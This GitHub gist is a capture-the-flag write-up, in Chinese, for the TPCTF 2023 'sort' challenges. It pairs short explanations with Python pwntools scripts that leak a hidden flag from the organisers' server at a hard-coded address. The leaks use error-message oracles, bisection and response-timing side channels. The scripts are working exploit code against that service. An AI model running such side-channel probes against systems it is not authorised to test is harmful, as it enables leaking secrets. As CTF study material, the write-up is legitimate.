Skip to content

Instantly share code, notes, and snippets.

@qwerty472123
Last active November 28, 2023 07:48
Show Gist options
  • Save qwerty472123/52899714c7f7d8cc4872902ba3d484a4 to your computer and use it in GitHub Desktop.
Save qwerty472123/52899714c7f7d8cc4872902ba3d484a4 to your computer and use it in GitHub Desktop.
TPCTF 2023 sort side-channel wp (AAA)

sort 1/2/teaser

侧信道3连 233

teaser

可以对check总是令B=A,然后对长度不足31的情况判断其长度令B=0还是A(0的时候所有flag乱序输出一致,否则不一致),这样可以根据报错leak长度信息。

发现长度不足31后,可以对长度不足的情况判断开头是否TPCTF,如果是,那么就是第一个没有乱序的flag,对于其他不足的情况总是返回0,对于这种情况判断其是否>mid来决定访问A还是0,这样可以二分出flag来。

from pwn import *
from tqdm import tqdm
from Crypto.Util.number import bytes_to_long, long_to_bytes

# Only show pwntools errors; play_once() opens a fresh connection per probe,
# so lower levels would flood the output. Switch to 'debug' to see raw traffic.
context.log_level = 'error'
# context.log_level = 'debug'

def play_once(res, host='202.112.238.82', port=13371):
    """Submit one function-A program to the teaser service and return its verdict.

    Each line of ``res`` is sent, followed by ``EOF``. If the service then asks
    for function B, an empty program (just ``EOF``) is sent. The connection is
    closed even if one of the exchanges raises (e.g. EOF from the server).

    Args:
        res: Program text for function A, one statement per line.
        host: Service host (defaults to the original challenge server).
        port: Service port.

    Returns:
        The first response line after submission. If the server prints a
        Python traceback, returns the ``AssertionError`` message with
        surrounding ``':'``/``' '`` characters stripped; an empty assertion
        message is reported as ``"don't cheat"``.
    """
    # For local testing, use process(['python3', 'sort-teaser.py']) instead.
    with remote(host, port) as rr:
        rr.recvuntil(b'Enter your function A:\n')
        for line in res.splitlines():
            rr.sendline(line.encode())
        rr.sendline(b'EOF')
        rc = rr.recvline().decode().strip()
        if rc == 'Enter your function B:':
            rr.sendline(b'EOF')
            rc = rr.recvline().decode().strip()
        if rc == 'Traceback (most recent call last):':
            # Skip the traceback body; the verdict is the assertion message.
            rr.recvuntil(b'AssertionError')
            rc = rr.recvline().strip().decode().strip(': ')
            if rc == '':
                print('pure error')
                rc = "don't cheat"
    return rc

# check length
def length_leq(x):
    """Build the DSL probe used to discover the flag length.

    The generated program sets ``B = A`` when ``A >= 2**(8*x)`` (A has more
    than ``x`` bytes) and ``B = 0`` otherwise. For ``x >= 31`` no program is
    built and ``True`` is returned instead.
    """
    if x < 31:
        return '\n'.join([f'U={8 * x}', 'X=1<<U', 'D=A>=X', 'B=D*A'])
    return True

# Lengths observed in earlier runs:
# flag1 = 31
# flag2 = 24
# flag3 = 29
# Probe lengths 30, 29, ..., 5. The scan stops at the first probe answered with
# 'results are not same'; `length` keeps the last length that did not trigger it
# (31 if the very first probe triggers it).
length = 31
for i in reversed(range(5, 31)):
    ret = play_once(length_leq(i))
    print(i, ret)
    if ret == 'results are not same':
        break
    length = i

print('len', length)

def create_value(x, v, chunk_bits=128):
    """Return DSL statements that load the non-negative integer ``v`` into ``x``.

    ``v`` is split into ``chunk_bits``-bit chunks, most significant first. The
    first chunk is assigned directly; each following chunk is placed in the
    scratch variable ``Z`` and appended with ``x=x<<chunk_bits`` / ``x=x+Z``.
    Presumably this keeps every literal short for the remote parser (the direct
    ``x=v`` form is avoided) — TODO confirm the service's literal limit.

    Args:
        x: Name of the DSL variable to assign.
        v: Value to load; must be >= 0.
        chunk_bits: Bits per literal chunk (default 128).

    Returns:
        Newline-separated statements, with a trailing newline. Note that the
        DSL variable ``Z`` is overwritten whenever ``v`` needs more than one chunk.

    Raises:
        ValueError: if ``v`` is negative (it would otherwise be silently encoded as 0).
    """
    if v < 0:
        raise ValueError(f'create_value only encodes non-negative integers, got {v}')
    mask = (1 << chunk_bits) - 1
    chunks = []
    while v > 0:
        chunks.append(v & mask)
        v >>= chunk_bits
    chunks.reverse()
    if not chunks:
        chunks = [0]
    lines = [f'{x}={chunks[0]}']
    for chunk in chunks[1:]:
        lines.append(f'Z={chunk}')
        lines.append(f'{x}={x}<<{chunk_bits}')
        lines.append(f'{x}={x}+Z')
    return '\n'.join(lines) + '\n'

# Bisect the flag value. This only runs if the length scan found a flag shorter
# than 31 bytes. The bounds assume a `length`-byte 'TPCTF{...}' flag whose inner
# bytes lie in [0x20, 0x7f].
if length != 31:
    left = bytes_to_long(b'TPCTF{' + b' '*(length-7) + b'}')
    right = bytes_to_long(b'TPCTF{' + b'\x7f'*(length-7) + b'}')
    while left < right:
        mid = (left + right) // 2
        print(long_to_bytes(mid))
        # Load the probe M and the current bounds L, R into DSL variables.
        payload = create_value('M', mid)
        payload += create_value('L', left)
        payload += create_value('R', right)
        # D==1: A >= 2**240, i.e. (per the author) the initial check value -> B=A
        # K==1: L <= A <= R, i.e. (per the author) the unshuffled TPCTF{...} flag -> B=A if M>=A
        # otherwise B=0
        payload += f"""
X=1<<{8*30}
D=A>=X
L=L<=A
R=A<=R
S=L+R
K=S==2
C=M>=A
C=C+K
C=C==2
D=D+C
D=D>=1
B=D*A
""".strip()
        ret = play_once(payload)
        # M>=A
        print(ret)
        # 'results are not same' is treated as "M >= flag": shrink from the right.
        if 'results are not same' == ret:
            right = mid
        else:
            left = mid + 1
    print(long_to_bytes(left))
    # Bisection finished; stop the script here.
    exit()

2

patch后的2版本对无猜测的侧信道造成了困难,但实际上可以先猜flag开头(TPCTF{之后的开头)一个字符,因为10次乱序后很难凑成第一个字符和正确的flag一样,即使运气不好也可以多跑几次取众数,这样只要开头猜对接下来就能区分真假flag,对真flag用二分条件决定输出。

from pwn import *
from tqdm import tqdm
from Crypto.Util.number import bytes_to_long, long_to_bytes

# Only show pwntools errors; each bisection step opens a new connection.
context.log_level = 'error'

def play_once(res, host='202.112.238.82', port=13372, level=b'2'):
    """Submit one function-A program to the sort service and return its verdict.

    Answers the ``Level:`` prompt with ``level``, sends each line of ``res``
    followed by ``EOF``, and answers an optional function-B prompt with an
    empty program. The connection is closed even if an exchange raises.

    Args:
        res: Program text for function A, one statement per line.
        host: Service host (defaults to the original challenge server).
        port: Service port.
        level: Bytes sent at the ``Level:`` prompt (default ``b'2'``).

    Returns:
        The first response line after submission. If the server prints a
        traceback, returns the ``AssertionError`` message with surrounding
        ``':'``/``' '`` characters stripped; an empty message becomes
        ``"don't cheat"``.
    """
    # For local testing, use process(['python3', 'sort2.py']) instead.
    with remote(host, port) as rr:
        rr.sendlineafter(b'Level: ', level)
        rr.recvuntil(b'Enter your function A:\n')
        for line in res.splitlines():
            rr.sendline(line.encode())
        rr.sendline(b'EOF')
        rc = rr.recvline().decode().strip()
        if rc == 'Enter your function B:':
            rr.sendline(b'EOF')
            rc = rr.recvline().decode().strip()
        if rc == 'Traceback (most recent call last):':
            # Skip the traceback body; the verdict is the assertion message.
            rr.recvuntil(b'AssertionError')
            rc = rr.recvline().strip().decode().strip(': ')
            if rc == '':
                print('pure error')
                rc = "don't cheat"
    return rc

# check length
def length_leq(x):
    """Build the DSL length probe: ``B = A`` if ``A >= 2**(8*x)``, else ``B = 0``.

    For ``x >= 31`` the function returns ``True`` rather than a program.
    """
    if x >= 31:
        return True
    bits = 8 * x
    return f'U={bits}\nX=1<<U\nD=A>=X\nB=D*A'

# Lengths observed in earlier runs:
# flag1 = 31
# flag2 = 24
# Target flag length, hard-coded (length_leq is not called in this script).
length = 29

print('len', length)
# Output file for recovered candidates (written as one line each with a b'\n'
# terminator). The name `cc` must not be rebound before those writes.
cc = open('flag', 'wb')
def create_value(x, v, chunk_bits=25):
    """Return DSL statements that load the non-negative integer ``v`` into ``x``.

    ``v`` is split into ``chunk_bits``-bit chunks, most significant first. The
    first chunk is assigned directly; each following chunk goes through the
    scratch variable ``Z`` via ``x=x<<chunk_bits`` / ``x=x+Z``. The small
    default (25 bits) presumably respects a literal-size limit of the level-2
    service — TODO confirm.

    Args:
        x: Name of the DSL variable to assign.
        v: Value to load; must be >= 0.
        chunk_bits: Bits per literal chunk (default 25).

    Returns:
        Newline-separated statements, with a trailing newline. The DSL variable
        ``Z`` is overwritten whenever more than one chunk is needed.

    Raises:
        ValueError: if ``v`` is negative (it would otherwise be silently encoded as 0).
    """
    if v < 0:
        raise ValueError(f'create_value only encodes non-negative integers, got {v}')
    mask = (1 << chunk_bits) - 1
    chunks = []
    while v > 0:
        chunks.append(v & mask)
        v >>= chunk_bits
    chunks.reverse()
    if not chunks:
        chunks = [0]
    lines = [f'{x}={chunks[0]}']
    for chunk in chunks[1:]:
        lines.append(f'Z={chunk}')
        lines.append(f'{x}={x}<<{chunk_bits}')
        lines.append(f'{x}={x}+Z')
    return '\n'.join(lines) + '\n'
import string
if length != 31:
    # Already-recovered part of the flag after 'TPCTF{'.
    # NOTE(review): `g` does not depend on `gc`, so every iteration repeats the
    # same bisection. Presumably this is deliberate: each result is appended to
    # the output file so the most frequent answer can be taken.
    known = b'13hm3r_'
    # Number of unknown bytes: total length minus 'TPCTF{', the known part and '}'.
    pad = length - len(b'TPCTF{') - len(known) - len(b'}')
    for gc in string.printable:
        print('guess', gc)
        g = known
        left = bytes_to_long(b'TPCTF{' + g + b' ' * pad + b'}')
        right = bytes_to_long(b'TPCTF{' + g + b'\x7f' * pad + b'}')
        # Consecutive identical answers. Named `streak`, not `cc`, so the output
        # file handle `cc` is not clobbered before cc.write() below.
        streak = 0
        notgood = False
        la = None
        while left < right:
            mid = (left + right) // 2
            print(long_to_bytes(mid))
            payload = create_value('M', mid)
            payload += create_value('L', left)
            payload += create_value('R', right)
            # Q counts bytes equal to 123 ('{') among the 31 low bytes of A
            # (assuming Q starts at 0 and '/' is integer division in the DSL —
            # TODO confirm against the service).
            payload += 'J=A\n'
            for _ in range(31):
                payload += 'D=J%256\n'
                payload += 'J=J/256\n'
                payload += 'D=D==123\n'
                payload += 'Q=Q+D\n'
            # Resulting B: B=A if A >= 2**240, or A contains no '{', or
            # (L <= A <= R and A <= M); otherwise B=0.
            payload += f"""
X=1<<{8*30}
D=A>=X
Q=Q==0
D=D+Q
D=D>0
L=L<=A
R=A<=R
S=L+R
K=S==2
C=M>=A
C=C+K
C=C==2
D=D+C
D=D>=1
B=D*A
    """.strip()
            ret = play_once(payload)
            print(ret)
            # True is taken to mean M >= A for the real flag.
            ut = 'results are not same' == ret
            if la != ut:
                streak = 0
            else:
                streak += 1
                if streak > 10:
                    # Too many identical answers in a row is taken as a sign
                    # the bisection is not tracking the real flag.
                    notgood = True
                    break
            la = ut
            if ut:
                right = mid
            else:
                left = mid + 1
        if notgood:
            print('not good')
            print(long_to_bytes(left))
        else:
            print(long_to_bytes(left))
            cc.write(long_to_bytes(left) + b'\n')
            cc.flush()

1

这题我先写一个花31*5句话做计数排序的计数(计数数组是一个大整数),然后再花几千行写展开的版本,但是长度超过限制。

from Crypto.Util.number import bytes_to_long

# A -> C: build the counting array. For each of the 31 low bytes of A,
# add 1 << (5*byte) to C, giving one 5-bit counter per byte value.
for _ in range(31):
    for stmt in ('D=A%256', 'A=A//256', 'D=D*5', 'D=1<<D', 'C=C+D'):
        print(stmt)

# C -> B: for each printable byte value, read its 5-bit count from the most
# significant bit down. Whenever a bit is set, shift B left and append
# 2**bit copies of that byte.
for ch in range(32, 127):
    for bit in reversed(range(5)):
        copies = 1 << bit
        print(f'K=1<<{5 * ch + bit}')
        print('K=C&K')
        print('K=K>0')
        print(f'M=K*{8 * copies}')
        print(f'U=K*{bytes_to_long(bytes([ch]) * copies)}')
        print('B=B<<M')
        print('B=B+U')

patch后的版本对于任何条件下看到flag后的输出均相同(除非预期解出题目),因此需要考虑时间侧信道。

考虑leak计数数组而非flag,这样就不用像第二问那样猜,而且有100次获取计数数组的机会,耗时可以大大增加。

然后就对计数数组做二分判断,如果满足条件就跑一段很花时间的大整数运算,不满足就触发一个溢出,使后面的大整数运算不会执行。

from pwn import *
from tqdm import tqdm
import time
from Crypto.Util.number import bytes_to_long, long_to_bytes

# Only show pwntools errors; every timing probe opens a new connection.
context.log_level = 'error'
# context.log_level = 'debug'
# Seconds between sending function A's final EOF and receiving the server's
# next line during the most recent play_once() call (written by play_once).
delta = 0
def play_once(res, host='202.112.238.82', port=13372, level=b'1'):
    """Submit one function-A program to the sort service, timing the reply.

    Answers the ``Level:`` prompt with ``level``, sends each line of ``res``
    followed by ``EOF``, and answers an optional function-B prompt with an
    empty program. The connection is closed even if an exchange raises.

    Side effect:
        Sets the global ``delta`` to the seconds between sending function A's
        final ``EOF`` and receiving the next line (the timing side channel).

    Args:
        res: Program text for function A, one statement per line.
        host: Service host (defaults to the original challenge server).
        port: Service port.
        level: Bytes sent at the ``Level:`` prompt (default ``b'1'``).

    Returns:
        The first response line after submission. If the server prints a
        traceback, returns the ``AssertionError`` message with surrounding
        ``':'``/``' '`` characters stripped; an empty message becomes
        ``"don't cheat"``.
    """
    global delta
    # For local testing, use process(['python3', 'sort2.py']) instead.
    with remote(host, port) as rr:
        rr.sendlineafter(b'Level: ', level)
        rr.recvuntil(b'Enter your function A:\n')
        for line in res.splitlines():
            rr.sendline(line.encode())
        rr.sendline(b'EOF')
        # perf_counter() is monotonic and high-resolution; time.time() can jump
        # if the wall clock is adjusted mid-measurement.
        start = time.perf_counter()
        rc = rr.recvline().decode().strip()
        delta = time.perf_counter() - start
        if rc == 'Enter your function B:':
            rr.sendline(b'EOF')
            rc = rr.recvline().decode().strip()
        if rc == 'Traceback (most recent call last):':
            # Skip the traceback body; the verdict is the assertion message.
            rr.recvuntil(b'AssertionError')
            rc = rr.recvline().strip().decode().strip(': ')
            if rc == '':
                print('pure error')
                rc = "don't cheat"
    return rc

# check length
def length_leq(x):
    """Build the timing-based length probe for level 1.

    Returns ``True`` (no program) for ``x >= 31``. Otherwise the program:

    * counts bytes equal to 123 (``{``) among the 31 low bytes of A into Q
      (assuming ``/`` is integer division in the DSL), then sets Q to 1 when
      there are none;
    * sets D = 1 when ``A >= 2**(8*x)`` or A has no ``{`` byte, and B = D*A;
    * flips D, multiplies it into ``999999 * 2**99999``, and appends 600
      ``D=1<<90030`` statements as the expensive tail used for timing.
    """
    if x >= 31:
        return True
    scan = ['D=J%256', 'J=J/256', 'D=D==123', 'Q=Q+D']
    decide = [
        'Q=Q==0',
        f'U={8 * x}',
        'X=1<<U',
        'D=A>=X',
        'D=D+Q',
        'D=D>=1',
        'B=D*A',
        'D=1-D',
        'P=1<<99999',
        'D=D*999999',
        'D=D*P',
    ]
    lines = ['J=A'] + scan * 31 + decide + ['D=1<<90030'] * 600
    return '\n'.join(lines)

# Lengths observed in earlier runs:
# flag1 = 24
# flag2 = 24
# Disabled length scan using the timing-based length_leq probe:
# length = 31
# for i in range(5, 31)[::-1]:
    
#     ret = play_once(length_leq(i))
#     print(i, ret, delta)
#     if ret == 'results are not same':
#         break
#     else:
#         length = i

# Flag length, hard-coded (presumably taken from an earlier run of the scan above).
length = 28
print('len', length)
# NOTE(review): this file is opened but never written in this script, and the
# name `cc` is rebound below.
cc = open('flag', 'wb')
def create_value(x, v, chunk_bits=128):
    """Return DSL statements that load the non-negative integer ``v`` into ``x``.

    ``v`` is split into ``chunk_bits``-bit chunks, most significant first. The
    first chunk is assigned directly; each following chunk goes through the
    scratch variable ``Z`` via ``x=x<<chunk_bits`` / ``x=x+Z``. Presumably this
    keeps every literal short for the remote parser — TODO confirm the limit.

    Args:
        x: Name of the DSL variable to assign.
        v: Value to load; must be >= 0.
        chunk_bits: Bits per literal chunk (default 128).

    Returns:
        Newline-separated statements, with a trailing newline. The DSL variable
        ``Z`` is overwritten whenever more than one chunk is needed.

    Raises:
        ValueError: if ``v`` is negative (it would otherwise be silently encoded as 0).
    """
    if v < 0:
        raise ValueError(f'create_value only encodes non-negative integers, got {v}')
    mask = (1 << chunk_bits) - 1
    chunks = []
    while v > 0:
        chunks.append(v & mask)
        v >>= chunk_bits
    chunks.reverse()
    if not chunks:
        chunks = [0]
    lines = [f'{x}={chunks[0]}']
    for chunk in chunks[1:]:
        lines.append(f'Z={chunk}')
        lines.append(f'{x}={x}<<{chunk_bits}')
        lines.append(f'{x}={x}+Z')
    return '\n'.join(lines) + '\n'

def stupid_calc(A):
    """Local mirror of the DSL histogram loop.

    Returns the sum of ``1 << (5 * b)`` over the 31 lowest bytes ``b`` of
    ``A``, zero bytes included (each contributes 1). Bytes above the 31st are
    ignored.
    """
    return sum(1 << (5 * ((A >> (8 * k)) & 255)) for k in range(31))

# Bisection bounds on the histogram integer Q. Assuming inner bytes lie in
# [0x20, 0x7f], an all-space flag gives the smallest Q and an all-0x7f flag the
# largest. sorted() does not change the result, since the histogram ignores order.
left = stupid_calc(bytes_to_long(bytes(sorted(b'TPCTF{' + b' '*(length-7) + b'}'))))
right = stupid_calc(bytes_to_long(bytes(sorted(b'TPCTF{' + b'\x7f'*(length-7) + b'}'))))
# Sanity check with a sample flag string of the same length: its Q must fall
# inside the bounds.
cc = stupid_calc(bytes_to_long(bytes(sorted(b'TPCTF{A_strAnge_s1dechannel}'))))
print('cur', cc)
assert left <= cc <= right
# NOTE(review): cc, notgood and la are not used by the code that follows; they
# appear to be leftovers from the level-2 script.
cc = 0
notgood = False
la = None

def judge(mid, theta=0.3):
    """Timing oracle for bisecting the flag's histogram integer Q.

    Builds a program that:

    * computes Q = sum(1 << (5*byte)) over the 31 low bytes of A (A is copied
      to B first);
    * loads the probe ``mid`` into M;
    * sets D = 1 only when 2**216 <= B <= 2**224 and M >= Q.

    D then scales ``999999 * 2**99999``, followed by 600 ``D=1<<90030``
    statements. The author's notes describe relying on an overflow to skip the
    expensive trailing work, so the two D outcomes should differ in response
    time. The remote DSL's overflow semantics are not visible here — TODO confirm.

    The program is sent twice; if the two runs disagree on ``delta > theta``,
    a third run breaks the tie (best of three).

    Args:
        mid: Candidate value for Q.
        theta: Seconds above which a reply counts as slow (default 0.3, the
            original hard-coded threshold).

    Returns:
        True when the majority of runs were fast (``delta <= theta``).
    """
    payload = 'B=A\n'
    for _ in range(31):
        payload += 'D=A&255\n'
        payload += 'A=A>>8\n'
        payload += 'D=D*5\n'
        payload += 'D=1<<D\n'
        payload += 'Q=Q+D\n'
    payload += create_value('M', mid)
    payload += f"""
L=1<<{8*27}
R=1<<{8*28}
L=L<=B
R=B<=R
S=L+R
K=S==2
C=M>=Q
C=C+K
D=C==2
P=1<<99999
D=D*999999
D=D*P
""".strip() + '\n' +  '\n'.join(['D=1<<90030']*600)

    def is_slow():
        # Submit once; play_once stores the reply latency in the global delta.
        play_once(payload)
        return delta > theta

    first = is_slow()
    second = is_slow()
    slow = first if first == second else is_slow()
    return not slow

# Bisect for the smallest M that judge() accepts. Assuming judge(mid) is True
# exactly when mid >= Q, the result is the flag's histogram integer Q.
tick = 0
while right > left:
    mid = (left + right) // 2
    print(tick, mid)
    tick += 1
    ut = judge(mid)
    left, right = (left, mid) if ut else (mid + 1, right)

print(left)

弄出来后写个对于开头check返回A,对于乱序flag返回排序flag(用计数数组求出)

# Final level-1 program (printed, not sent). Inputs with 2**216 <= A <= 2**224
# are replaced by the constant X; all other inputs are echoed unchanged.
# X is presumably the sorted flag derived from the recovered histogram.
# The histogram Q built by the loop is not referenced by the tail.
hist = ['D=A&255', 'A=A>>8', 'D=D*5', 'D=1<<D', 'Q=Q+D']
tail = [
    f'L=1<<{8*27}',
    f'R=1<<{8*28}',
    'L=L<=B',
    'R=B<=R',
    'S=L+R',
    'K=S==2',
    'X=4229435530265415963707867948001991994972200797905249491392287832957',
    'U=1-K',
    'B=B*U',
    'R=K*X',
    'B=B+R',
]
payload = '\n'.join(['B=A'] + hist * 31 + tail)
print(payload)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment